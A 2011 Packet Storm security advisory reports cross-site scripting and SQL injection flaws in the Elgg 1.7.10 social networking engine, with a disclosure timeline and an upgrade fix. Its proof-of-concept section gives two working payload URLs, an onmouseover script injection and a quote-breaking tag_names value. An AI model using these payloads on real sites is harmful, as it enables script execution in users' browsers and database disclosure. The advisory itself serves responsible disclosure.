Elgg 1.7.10 Cross Site Scripting / SQL Injection

2011-08-18T00:00:00
ID PACKETSTORM:104159
Type packetstorm
Reporter Aung Khant
Modified 2011-08-18T00:00:00

Description

                                        
                                            `1. OVERVIEW  
  
The Elgg 1.7.10 and lower versions are vulnerable to Cross Site  
Scripting and SQL Injection.  
  
  
2. BACKGROUND  
  
Elgg is an award-winning social networking engine, delivering the  
building blocks that enable businesses, schools, universities and  
associations to create their own fully-featured social networks and  
applications. Well-known Organizations with networks powered by Elgg  
include: Australian Government, British Government, Federal Canadian  
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,  
Johns Hopkins University and more (http://elgg.org/powering.php)  
  
  
3. VULNERABILITY DESCRIPTION  
  
The "internalname" parameter is not properly sanitized, which allows  
attacker to conduct Cross Site Scripting attack. This may allow an  
attacker to create a specially crafted URL that would execute  
arbitrary script code in a victim's browser. The "tag_names" is not  
properly sanitized, which allows attacker to conduct SQL Injection  
attack.  
  
  
4. VERSIONS AFFECTED  
  
Elgg 1.7.10 <=  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
- Cross Site Scripting  
  
http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22  
  
- SQL Injection > Info Disclosure  
  
http://localhost/pg/search/?q=SQLin&search_type=tags&tag_names=location%27  
  
  
6. SOLUTION  
  
Upgrade to 1.7.11 or higher.  
  
  
7. VENDOR  
  
Curverider Ltd  
http://www.curverider.co.uk/  
http://elgg.org/  
  
  
8. CREDIT  
  
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN  
Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2011-08-01: vulnerability reported  
2011-08-15: vendor released fixed version  
2011-08-18: vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/[elgg_1710]_xss_sqlin  
Project Home: http://elgg.org/  
Vendor Release Note:  
http://blog.elgg.org/pg/blog/brett/read/189/elgg-1711-released  
  
  
  
#yehg [2011-08-18]  
`